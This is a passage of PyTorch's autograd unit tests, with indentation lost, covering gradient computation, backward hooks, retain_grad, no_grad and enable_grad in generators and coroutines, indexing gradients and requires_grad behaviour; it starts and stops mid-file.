x = torch.ones(1, requires_grad=True)
y = torch.ones(1, requires_grad=True)
# Make sure x and y have grad accumulators allocated
z = x * 2
w = y * 2
grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=True)
self.assertEqual(grad_x, x * 2)
self.assertIsNone(grad_y)
# This is slightly different than the case above, because z doesn't even
# have a grad accumulator allocated.
z = torch.ones(1, requires_grad=True)
grad_x, grad_z = torch.autograd.grad(x * 2, [x, z], allow_unused=True)
self.assertEqual(grad_x, x * 2)
self.assertIsNone(grad_z)
# allow_unused=False, but grads contains None inside, should throw
with self.assertRaisesRegex(RuntimeError,
"Set allow_unused=True"):
grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=False)
def test_grad_unreachable_discovery(self):
# Test that certain nodes are not erroneously executed when an input
# is unreachable. See #39784
class MyFunc(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
self.fail("This node should not be executed!")
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
(gY,) = torch.autograd.grad(x, (y, ), allow_unused=True)
self.assertIsNone(gY)
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
z = torch.randn(1, requires_grad=True)
(gY, gZ) = torch.autograd.grad(x + z, (y, z), allow_unused=True)
self.assertIsNone(gY)
self.assertIsNotNone(gZ)
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
torch.autograd.backward(x, inputs=(y, )) # allow_unused is implicitly True!
self.assertIsNone(y.grad)
def test_hooks(self):
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5) * 4
y.requires_grad_(True)
counter = [0]
def bw_hook(inc, grad):
self.assertIsInstance(grad, torch.Tensor)
counter[0] += inc
z = x ** 2 + x * 2 + x * y + y
x.register_hook(lambda *args: bw_hook(0, *args))
test = z.register_hook(lambda *args: bw_hook(1, *args))
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 1)
test2 = z.register_hook(lambda *args: bw_hook(2, *args))
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 4)
test2.remove()
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 5)
def bw_hook_modify(grad):
return grad.mul(2)
test.remove()
z.register_hook(bw_hook_modify)
with torch.no_grad():
y.grad.zero_()
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(y.grad, (x + 1) * 2)
y.register_hook(bw_hook_modify)
with torch.no_grad():
y.grad.zero_()
z.backward(torch.ones(5, 5))
self.assertEqual(y.grad, (x + 1) * 4)
def test_hooks_cpp(self):
# Tests hooks for autograd function implemented in C++
bn = torch.nn.BatchNorm1d(5, affine=False)
bn.double()
bn.eval()
counter = [0]
def bw_hook(grad):
counter[0] += 1
return grad * 2
x = torch.ones(5, 5, dtype=torch.double, requires_grad=True)
z = bn(x)
z.register_hook(bw_hook)
z.sum().backward()
self.assertEqual(counter[0], 1, msg='bw_hook not called')
self.assertEqual(x.grad, torch.ones(5, 5, dtype=torch.double) * 2, atol=1e-5, rtol=0)
def test_hook_none(self):
# WARNING: this is a test for autograd internals.
# You should never have to use such things in your code.
class NoneGradientFunction(Function):
@staticmethod
def forward(ctx, x, y):
assert ctx.needs_input_grad[0]
assert not ctx.needs_input_grad[1]
return x, y
@staticmethod
def backward(ctx, grad_x, grad_y):
return grad_x, None
was_called = [False]
def hook(grad):
self.assertIsNotNone(grad)
was_called[0] = True
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5)
rx, ry = NoneGradientFunction.apply(x, y)
rx.register_hook(hook)
ry.register_hook(hook)
sum(rx, ry).sum().backward()
self.assertTrue(was_called[0])
def test_retain_grad(self):
input = torch.rand(1, 3, requires_grad=True)
h1 = input * 3
out = (h1 * h1).sum()
# It should be possible to call retain_grad() multiple times
h1.retain_grad()
h1.retain_grad()
# Gradient should be accumulated
out.backward(retain_graph=True)
self.assertEqual(h1 * 2, h1.grad)
out.backward(retain_graph=True)
self.assertEqual(h1 * 4, h1.grad)
with torch.no_grad():
input.grad.zero_()
# It should be a no-op for leaves
input.retain_grad()
input.retain_grad()
out.backward()
self.assertEqual(input * 18, input.grad)
def test_retain_grad_cycle(self):
x = torch.ones(5, 5, requires_grad=True)
def run_test():
y = x * 2
y.retain_grad()
return y / 2, torch._C._WeakTensorRef(y)
z, ref = run_test()
self.assertTrue(ref.expired())
z.sum().backward()
def test_backward(self):
v = torch.randn(5, 5, requires_grad=True)
x = torch.randn(5, 5, requires_grad=True)
y = (torch.rand(5, 5) + 0.1).requires_grad_(True)
z = torch.randn(5, 5, requires_grad=True)
grad_output = torch.randn(5, 5)
v.backward(grad_output)
self.assertEqual(v.grad, grad_output)
a = x + (y * z) + 4 * z ** 2 * x / y
a.backward(grad_output)
x_grad = 4 * z.pow(2) / y + 1
y_grad = z - 4 * x * z.pow(2) / y.pow(2)
z_grad = 8 * x * z / y + y
self.assertEqual(x.grad, x_grad * grad_output)
self.assertEqual(y.grad, y_grad * grad_output)
self.assertEqual(z.grad, z_grad * grad_output)
def test_sparse_mm_backward(self):
size = (3, 3)
sparse = torch.sparse_coo_tensor(size, requires_grad=True)
dense = torch.randn(size, requires_grad=True)
with self.assertRaisesRegex(
RuntimeError,
"The backward pass for this operation requires the 'mat1' tensor to be strided,"):
z = dense.addmm(sparse, dense)
mm_test_cases = [
# a requires grad, a is sparse, b requires grad, b is sparse, error message
(False, True, True, False, None),
(False, False, True, True, "The backward pass for this operation requires the 'mat2'"),
(False, True, True, True, "The backward pass for this operation requires the 'mat2'"),
(True, False, True, True, "The backward pass for this operation requires the 'mat2'"),
(True, True, False, False, "The backward pass for this operation requires the 'self'"),
(True, True, True, False, "The backward pass for this operation requires the 'self'"),
(True, True, True, True, "The backward pass for this operation requires the 'mat2'"),
]
for a_req_grad, a_is_sparse, b_req_grad, b_is_sparse, err_msg in mm_test_cases:
# We should only be testing cases with sparse inputs, and at least one
# input needs to require grad so we can call a backward pass
assert a_is_sparse or b_is_sparse
assert a_req_grad or b_req_grad
a = torch.randn(size, requires_grad=a_req_grad)
if a_is_sparse:
a = a.to_sparse()
b = torch.randn(size, requires_grad=b_req_grad)
if b_is_sparse:
b = b.to_sparse()
# If no error expected, check that sparse and dense cases match
if err_msg is None:
r = a.mm(b)
r.sum().backward()
a_grad = None if a.grad is None else a.grad.clone().detach()
b_grad = None if b.grad is None else b.grad.clone().detach()
# Redo with only dense tensors
a = (a.to_dense() if a.is_sparse else a).clone().detach()
a.requires_grad = a_req_grad
b = (b.to_dense() if b.is_sparse else b).clone().detach()
b.requires_grad = b_req_grad
r = a.mm(b)
r.sum().backward()
self.assertEqual(a_grad, a.grad)
self.assertEqual(b_grad, b.grad)
else:
with self.assertRaisesRegex(RuntimeError, err_msg):
a.mm(b)
def test_multi_backward(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
q = torch.randn(5, 5, requires_grad=True)
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
q2 = q * 2
z = x + y + q2
c = a * b + q2
grad_z = torch.randn(5, 5)
grad_c = torch.randn(5, 5)
torch.autograd.backward([z, c], [grad_z, grad_c])
self.assertEqual(x.grad, grad_z)
self.assertEqual(y.grad, grad_z)
self.assertEqual(a.grad, grad_c * b)
self.assertEqual(b.grad, grad_c * a)
self.assertEqual(q.grad, (grad_c + grad_z) * 2)
def test_multi_backward_no_grad(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=False)
z = x + y
q = y * 2
# NB: we currently raise an exception if any arguments to backwards
# have requires_grad=False and don't have a grad_fn. We may want to
# relax that check to a warning.
def call_backwards():
torch.autograd.backward([z, q], [torch.ones(5, 5), torch.ones(5, 5)])
self.assertRaises(RuntimeError, call_backwards)
def test_backward_with_inputs(self):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
def fn():
return x ** 2 + y * x + y ** 2
gradient = torch.ones(2, 2)
x_grad_expected = 2 * x + y
y_grad_expected = x + 2 * y
@torch.no_grad()
def reset_grad():
x.grad.zero_()
y.grad.zero_()
torch.autograd.backward(fn(), gradient, inputs=[x, y])
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(y.grad, y_grad_expected)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=[x])
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(y.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=[y])
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=y)
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
self.assertRaisesRegex(RuntimeError, 'cannot be empty',
lambda: torch.autograd.backward(fn(), gradient, inputs=[]))
def test_backward_with_nonleaf_inputs(self):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
x_nonleaf = x * 1
y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
z = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
out = x_nonleaf ** 2 + y * x_nonleaf + y ** 2
out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[x, y, x_nonleaf])
x_grad_expected = 2 * x + y
y_grad_expected = x + 2 * y
x_non_leaf_expected = 2 * x_nonleaf + y
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(x_nonleaf.grad, x_non_leaf_expected)
# backward doesn't have an allow_unused flag, so the behavior of backward
# when variable is not part of the graph is as if allow_used were true
# x.grad will simply be None.
out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[z])
self.assertIsNone(z.grad)
def test_dependent_backward(self):
x = torch.randn(10, requires_grad=True)
y = x ** 2
z = y ** 3
go_y = torch.randn(10)
go_z = torch.randn(10)
torch.autograd.backward([y, z], [go_y, go_z])
xd = x
self.assertEqual(x.grad, 2 * xd * go_y + 6 * xd.pow(5) * go_z)
def test_save_output_nr(self):
x = torch.randn(10, requires_grad=True)
class MultiOutputFn(Function):
@staticmethod
def forward(ctx, x):
return x[:5], x[5:]
@staticmethod
def backward(ctx, *grad):
return torch.cat(grad)
a, b = MultiOutputFn.apply(x)
self.assertEqual(b.output_nr, 1)
class TestFn(Function):
@staticmethod
def forward(ctx, b):
ctx.save_for_backward(b)
return b * 2
@staticmethod
def backward(ctx, grad_b):
b, = ctx.saved_tensors
self.assertEqual(b.output_nr, 1)
TestFn.apply(b).sum().backward()
def test_free_deep_graph(self):
def scope():
depth = 150000
x = torch.randn(1, requires_grad=True)
y = x.clone()
# build a "chain" computation graph
for _ in range(depth):
y = y + y * 0.000001
# graph deletion occurs when the above locals go out of scope.
# In this case `del y` will trigger it but it's easier to leave
# it to Python to delete the locals.
# Should not stack overflow
scope()
def test_free_deep_graph_complicated(self):
def scope():
depth = 100000
randchoice = torch.randint(2, [depth, 2])
x = torch.randn(1, requires_grad=True)
y = x.clone()
# Hold the two previous values
prev_values = [None, None]
# Build a "chain with skip connections" graph
for _ in range(depth):
prev_tensors = [tensor for tensor in prev_values[:-1]
if tensor is not None]
prev_values.append(y)
prev_values.pop(0)
# Definitely pick one tensor to add
y += y * 0.000001
# Possibly add other tensors
nprev = len(prev_tensors)
if nprev == 2:
y += randchoice[depth].mul(torch.cat(prev_tensors)).sum()
# graph deletion occurs when the above locals go out of scope.
# Should not stack overflow
scope()
def test_free_deep_graph_pyfunction(self):
class MyOp(Function):
@staticmethod
def forward(ctx, tensor1, tensor2):
return tensor1 + tensor2
@staticmethod
def backward(ctx, grad_output):
return grad_output, grad_output
def scope():
depth = 150000
x = torch.randn(1, requires_grad=True)
y = x.clone()
# build deeply nested computation graph
for _ in range(depth):
y = MyOp.apply(y, y)
# graph deletion occurs when the above locals go out of scope.
# Should not stack overflow
scope()
def test_no_unnecessary_save(self):
# If we kept x in the derivative Function of x * 2 we would
# get an error in the backward that would complain that we've
# modified x, which was needed for gradient computation.
# Since we should elide unnecessary saves, this test should pass.
mu = torch.ones(1, requires_grad=True)
x = torch.empty(1)
loss = 0
for i in range(3):
x.detach_()
x.copy_(mu + i)
ft = torch.tensor([float(i)])
multiplied = x * ft
s = multiplied.sum()
loss += s
loss.backward()
def test_no_grad(self):
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5) * 4
with torch.no_grad():
w = x + y
@torch.no_grad()
def adder(x, y):
return x + y
z = adder(x, y)
self.assertFalse(w.requires_grad)
self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
self.assertIsNone(w.grad_fn)
self.assertFalse(z.requires_grad)
self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
self.assertIsNone(z.grad_fn)
# test nested decorator and with-statement on no_grad
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
w = adder(x, y)
self.assertFalse(torch.is_grad_enabled())
def test_set_grad_generator_functions(self):
@torch.no_grad()
def gen_no_grad():
for i in range(10):
self.assertEqual(torch.is_grad_enabled(), False)
yield i
with torch.enable_grad():
for _ in gen_no_grad():
self.assertEqual(torch.is_grad_enabled(), True)
@torch.enable_grad()
def gen_enable_grad():
for i in range(10):
self.assertEqual(torch.is_grad_enabled(), True)
yield i
with torch.no_grad():
for _ in gen_enable_grad():
self.assertEqual(torch.is_grad_enabled(), False)
def test_set_grad_generator_functions_recursive(self):
# enable_grad_decorator_recursive and no_grad_decorator_recursive call each other
# recursively, to ensure that the decorators preserve the caller's setting
@torch.enable_grad()
def enable_grad_decorator_recursive(depth):
self.assertTrue(torch.is_grad_enabled())
if depth > 0:
no_grad_decorator_recursive(depth - 1)
self.assertTrue(torch.is_grad_enabled())
@torch.no_grad()
def no_grad_decorator_recursive(depth):
self.assertFalse(torch.is_grad_enabled())
if depth > 0:
enable_grad_decorator_recursive(depth - 1)
self.assertFalse(torch.is_grad_enabled())
# enable_grad_context_manager_recursive and no_grad_context_manager_recursive call
# each other recursively, to ensure that the decorators preserve the caller's setting
def enable_grad_context_manager_recursive(depth):
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
if depth > 0:
no_grad_context_manager_recursive(depth - 1)
self.assertTrue(torch.is_grad_enabled())
def no_grad_context_manager_recursive(depth):
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
if depth > 0:
enable_grad_context_manager_recursive(depth - 1)
self.assertFalse(torch.is_grad_enabled())
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
enable_grad_decorator_recursive(10)
self.assertTrue(torch.is_grad_enabled())
enable_grad_context_manager_recursive(10)
self.assertTrue(torch.is_grad_enabled())
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
enable_grad_decorator_recursive(10)
self.assertFalse(torch.is_grad_enabled())
enable_grad_context_manager_recursive(10)
self.assertFalse(torch.is_grad_enabled())
def test_set_grad_coroutines(self):
@torch.no_grad()
def coro_no_grad(n=10):
self.assertFalse(torch.is_grad_enabled())
for i in range(n):
self.assertFalse(torch.is_grad_enabled())
r = yield i
self.assertFalse(torch.is_grad_enabled())
self.assertEqual(i, r)
self.assertFalse(torch.is_grad_enabled())
@torch.enable_grad()
def coro_enable_grad(n=10):
self.assertTrue(torch.is_grad_enabled())
for i in range(n):
self.assertTrue(torch.is_grad_enabled())
r = yield i
self.assertTrue(torch.is_grad_enabled())
self.assertEqual(i, r)
self.assertTrue(torch.is_grad_enabled())
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
coro, r = coro_no_grad(), None
try:
while True:
self.assertTrue(torch.is_grad_enabled())
r = coro.send(r)
self.assertTrue(torch.is_grad_enabled())
except StopIteration:
pass
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
coro, r = coro_enable_grad(), None
try:
while True:
self.assertFalse(torch.is_grad_enabled())
r = coro.send(r)
self.assertFalse(torch.is_grad_enabled())
except StopIteration:
pass
def test_set_grad_coroutines_benign_exceptions(self):
class RecoverableException(Exception):
pass
@torch.no_grad()
def coro_no_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertFalse(torch.is_grad_enabled())
yield (-i if has_raised else i)
except RecoverableException:
self.assertFalse(torch.is_grad_enabled())
has_raised = True
@torch.enable_grad()
def coro_enable_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertTrue(torch.is_grad_enabled())
yield (-i if has_raised else i)
except RecoverableException:
self.assertTrue(torch.is_grad_enabled())
has_raised = True
with torch.enable_grad():
coro = coro_no_grad()
assert 0 == next(coro)
try:
while True:
r = coro.throw(RecoverableException)
self.assertLess(r, 0)
except StopIteration:
pass
with torch.no_grad():
coro = coro_enable_grad()
assert 0 == next(coro)
try:
while True:
r = coro.throw(RecoverableException)
self.assertLess(r, 0)
except StopIteration:
pass
def test_set_grad_coroutines_critical_exceptions(self):
class UnrecoverableException(Exception):
pass
class SecondaryException(Exception):
pass
@torch.no_grad()
def coro_no_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertFalse(torch.is_grad_enabled())
yield (-i if has_raised else i)
except UnrecoverableException:
self.assertFalse(torch.is_grad_enabled())
raise SecondaryException
@torch.enable_grad()
def coro_enable_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertTrue(torch.is_grad_enabled())
yield (-i if has_raised else i)
except UnrecoverableException:
self.assertTrue(torch.is_grad_enabled())
raise SecondaryException
with torch.enable_grad():
coro = coro_no_grad()
assert 0 == next(coro)
with self.assertRaises(SecondaryException):
coro.throw(UnrecoverableException)
with torch.no_grad():
coro = coro_enable_grad()
assert 0 == next(coro)
with self.assertRaises(SecondaryException):
coro.throw(UnrecoverableException)
def test_set_grad_coroutines_exit(self):
@torch.no_grad()
def coro_no_grad(state):
for i in range(10):
try:
self.assertFalse(torch.is_grad_enabled())
yield i
except GeneratorExit:
self.assertFalse(torch.is_grad_enabled())
state.add('GeneratorExit')
raise
@torch.enable_grad()
def coro_enable_grad(state):
for i in range(10):
try:
self.assertTrue(torch.is_grad_enabled())
yield i
except GeneratorExit:
self.assertTrue(torch.is_grad_enabled())
state.add('GeneratorExit')
raise
state = set()
with torch.enable_grad():
coro = coro_no_grad(state)
for i in range(5):
next(coro)
coro.close()
self.assertTrue('GeneratorExit' in state)
state = set()
with torch.no_grad():
coro = coro_enable_grad(state)
for i in range(5):
next(coro)
coro.close()
self.assertTrue('GeneratorExit' in state)
def test_no_grad_python_function(self):
"""Python Functions should respect grad mode."""
x = torch.ones(5, 5, requires_grad=True)
class MyOp(Function):
@staticmethod
def forward(self, x):
return x + 1
@staticmethod
def backward(self, dy):
return dy
with torch.no_grad():
y = MyOp.apply(x)
self.assertFalse(y.requires_grad)
def test_indexing(self):
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
def compare(x, y, idx, indexed_tensor, indexed_var):
indexed_var_t = indexed_var.data
if not isinstance(indexed_tensor, torch.Tensor):
indexed_var_t = indexed_var_t[0]
self.assertEqual(indexed_tensor, indexed_var_t)
indexed_var.sum().backward()
expected_grad = torch.empty(x.size()).fill_(0)
expected_grad[idx] = 1
self.assertEqual(y.grad, expected_grad)
def check_index(x, y, idx):
if y.grad is not None:
with torch.no_grad():
y.grad.zero_()
indexed_tensor = x[idx]
indexed_var = y[idx]
compare(x, y, idx, indexed_tensor, indexed_var)
check_index(x, y, 1)
check_index(x, y, (1, 1))
check_index(x, y, slice(1, None))
check_index(x, y, slice(None, 2))
check_index(x, y, (slice(None, 2), 2))
check_index(x, y, (slice(1, 2), 2))
check_index(x, y, (1, slice(2, None)))
check_index(x, y, (slice(None, None), slice(2, None)))
check_index(x, y, torch.LongTensor([0, 2]))
check_index(x, y, torch.rand(4, 4).bernoulli().bool())
check_index(x, y, (Ellipsis, slice(2, None)))
check_index(x, y, ([0], [0]))
check_index(x, y, ([1, 2, 3], [0]))
check_index(x, y, ([1, 2], [2, 1]))
check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 3]]))
check_index(x, y, ([slice(None), [2, 3]]))
check_index(x, y, ([[2, 3], slice(None)]))
# advanced indexing, with less dim, or ellipsis
check_index(x, y, ([0]))
check_index(x, y, ([0], ))
x = torch.arange(1., 49).view(4, 3, 4)
y = Variable(x, requires_grad=True)
check_index(x, y, (slice(None), [0], [0]))
check_index(x, y, ([0], [0], slice(None)))
check_index(x, y, (slice(None), [0, 1, 2], [0]))
check_index(x, y, ([0, 1, 2], [0], slice(None)))
check_index(x, y, (slice(None), [1, 2], [2, 1]))
check_index(x, y, ([1, 2], [2, 1], slice(None)))
check_index(x, y, (slice(None), [[1, 2], [2, 0]], [[0, 1], [2, 3]]))
check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 2]], slice(None)))
check_index(x, y, (slice(None), slice(None), [2, 1]))
check_index(x, y, (slice(None), [2, 1], slice(None)))
check_index(x, y, ([2, 1], slice(None), slice(None)))
# advanced indexing, with less dim, or ellipsis
check_index(x, y, ([0], ))
check_index(x, y, ([0], slice(None)))
check_index(x, y, ([0], Ellipsis))
check_index(x, y, ([1, 2], [0, 1]))
check_index(x, y, ([1, 2], [0, 1], Ellipsis))
check_index(x, y, (Ellipsis, [1, 2], [0, 1]))
# advanced indexing, with a tensor wrapped in a variable
z = torch.LongTensor([0, 1])
zv = Variable(z, requires_grad=False)
seq = [z, Ellipsis]
seqv = [zv, Ellipsis]
if y.grad is not None:
with torch.no_grad():
y.grad.zero_()
indexed_tensor = x[seq]
indexed_var = y[seqv]
compare(x, y, seq, indexed_tensor, indexed_var)
def test_indexing_duplicates(self):
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = torch.LongTensor([1, 1, 3, 2, 1, 2])
y[idx].sum().backward()
expected_grad = torch.zeros(4, 4)
for i in idx:
expected_grad[i] += 1
self.assertEqual(y.grad, expected_grad)
# with advanced indexing
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = [[1, 1, 3, 2, 1, 2], [0]]
y[idx].sum().backward()
expected_grad = torch.zeros(4, 4)
for i in idx[0]:
for j in idx[1]:
expected_grad[i][j] += 1
self.assertEqual(y.grad, expected_grad)
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = [[[1, 2], [0, 0]], [[0, 1], [1, 1]]]
y[idx].sum().backward()
expected_grad = torch.tensor([[0., 2., 0., 0.],
[1., 0., 0., 0.],
[0., 1., 0., 0.],
[0., 0., 0., 0.]])
self.assertEqual(y.grad, expected_grad)
x = torch.arange(1., 65).view(4, 4, 4)
y = Variable(x, requires_grad=True)
idx = [[1, 1, 1], slice(None), slice(None)]
y[idx].sum().backward()
expected_grad = torch.empty(4, 4, 4).zero_()
expected_grad[1].fill_(3)
self.assertEqual(y.grad, expected_grad)
def test_index_backward_does_not_save_tensor(self):
# Example from https://github.com/pytorch/pytorch/issues/24853.
# if `index(tensor, indices)` saves `tensor` for backwards, then it will
# trigger a version check on `tensor` during the backward pass, which
# will cause the following code to error because `tensor` gets modified
# by the indexing line.
a = torch.tensor([1., 0, 0])
b = torch.zeros(3, requires_grad=True)
tensor = b + 0
tensor[a != 0] = tensor[a != 0]
tensor.backward(torch.zeros_like(tensor))
def test_volatile_deprecated(self):
v = torch.autograd.torch.randn(3, 3)
with warnings.catch_warnings(record=True) as w:
self.assertFalse(v.volatile)
self.assertIn('volatile', str(w[0].message))
def test_saved_variables_deprecated(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, tensor2):
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + tensor2
@staticmethod
def backward(ctx, grad_output):
var1, var2 = ctx.saved_variables
return (grad_output, grad_output)
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter("always")
x = torch.randn((3, 3), requires_grad=True)
y = torch.randn((3, 3), requires_grad=True)
MyFunction.apply(x, y).sum().backward()
has_deprecated = map(lambda warn:
'deprecated' in str(warn) and
'saved_variables' in str(warn),
warns)
has_deprecated = reduce(lambda x, y: x or y, has_deprecated)
self.assertTrue(has_deprecated)
def test_requires_grad(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
z = torch.randn(5, 5, requires_grad=True)
a = x + y
self.assertFalse(a.requires_grad)
b = a + z
self.assertTrue(b.requires_grad)
def error():
raise RuntimeError
# Make sure backward isn't called on these
a._backward_hooks = OrderedDict()
x._backward_hooks = OrderedDict()
y._backward_hooks = OrderedDict()
a._backward_hooks['test'] = error
x._backward_hooks['test'] = error
y._backward_hooks['test'] = error
b.backward(torch.ones(5, 5))
def test_requires_grad_(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5, requires_grad=True)
self.assertIs(x, x.requires_grad_())
self.assertTrue(x.requires_grad)
self.assertIs(y, y.requires_grad_())
self.assertTrue(y.requires_grad)
self.assertIs(x, x.requires_grad_(True))
self.assertTrue(x.requires_grad)
self.assertIs(y, y.requires_grad_(True))
self.assertTrue(y.requires_grad)
z = x * y
self.assertRaises(RuntimeError, lambda: z.requires_grad_(False))
self.assertIs(z, z.requires_grad_())
self.assertTrue(z.requires_grad)
self.assertIs(z, z.requires_grad_(True))
self.assertTrue(z.requires_grad)
self.assertIs(x, x.requires_grad_(False))
self.assertFalse(x.requires_grad)
self.assertIs(y, y.requires_grad_(False))
self.assertFalse(y.requires_grad)
def test_requires_grad_inplace(self):
a = torch.randn(5, 5)
b = torch.randn(5, 5, requires_grad=True)
a += b
self.assertTrue(a.requires_grad)
# non-leaf
a = torch.randn(5, 5) + 0
b = torch.randn(5, 5, requires_grad=True)
a += b
self.assertTrue(a.requires_grad)
def test_no_requires_grad_inplace(self):
# basic case, should be able to modify inplace while requires_grad is False
a = torch.randn(2, 3)
a.add_(5)
a.requires_grad = True
a.sum().backward()
self.assertEqual(a.grad, torch.ones(2, 3))
# same but with a view
a = torch.randn(2, 3)
b = a[:]
b.add_(5)
a.requires_grad = True
a.sum().backward()
self.assertEqual(a.grad, torch.ones(2, 3))
# should fail if requires_grad = True when we modify inplace
a = torch.randn(2, 3)
b = a[:]
a.requires_grad = True
with self.assertRaises(RuntimeError):
a.add_(5)
with self.assertRaises(RuntimeError):
b.add_(5)
def test_attribute_deletion(self):
x = torch.randn((5, 5), requires_grad=True)
del x.grad
self.assertIsNone(x.grad)
with self.assertRaises(RuntimeError):
del x.data
with self.assertRaises(TypeError):
x.data = None
with self.assertRaises(RuntimeError):
del x.requires_grad
with self.assertRaises(RuntimeError):
del x._grad_fn
with self.assertRaises(RuntimeError):
del x._backward_hooks
def test_duplicate_backward_root(self):
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
x = a * b
grad_output = torch.randn_like(x)
torch.autograd.backward([x, x], [grad_output, grad_output])
self.assertEqual(a.grad, b * grad_output * 2)
self.assertEqual(b.grad, a * grad_output * 2)
def test_backward_no_grad(self):
a = torch.randn(5, 5, requires_grad=True)
b = a + 2
with self.assertRaises(RuntimeError):
torch.autograd.backward([b], [None])
def test_backward_twice_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
self.assertRaisesRegex(RuntimeError, 'Specify retain_graph=True',
lambda: c.backward(torch.tensor([1, 1, 1], dtype=torch.double)))
def test_backward_twice_retained_graph_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = b + 1
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_retained_graph_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_create_graph_warns(self):
try:
prev = torch.is_warn_always_enabled()
torch.set_warn_always(True)
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = b * b
with warnings.catch_warnings(record=True) as ws:
c.backward(torch.ones_like(c), create_graph=True)
b.grad = None
self.assertTrue(any('Using backward() with create_graph=True' in str(w.message) for w in ws))
# Should not warn for grad
with warnings.catch_warnings(record=True) as ws:
torch.autograd.grad(c, b, torch.ones_like(c), create_graph=True)
self.assertFalse(any('Using backward() with create_graph=True' in str(w.message) for w in ws))
finally:
torch.set_warn_always(prev)
def test_next_functions(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
a = x + y
self.assertIsNotNone(a.grad_fn)
next_functions = a.grad_fn.next_functions
self.assertEqual(len(next_functions), 2)
self.assertIsInstance(next_functions[0][0], torch._C._functions.AccumulateGrad)
self.assertEqual(next_functions[0][1], 0)
self.assertIsInstance(next_functions[1][0], torch._C._functions.AccumulateGrad)
self.assertEqual(next_functions[1][1], 0)
b = a + 5
next_functions = b.grad_fn.next_functions
self.assertEqual(len(next_functions), 2)
self.assertIs(next_functions[0][0], a.grad_fn)
self.assertIs(next_functions[1][0], None)
def test_inplace(self):
x = torch.ones(5, 5, requires_grad=True)
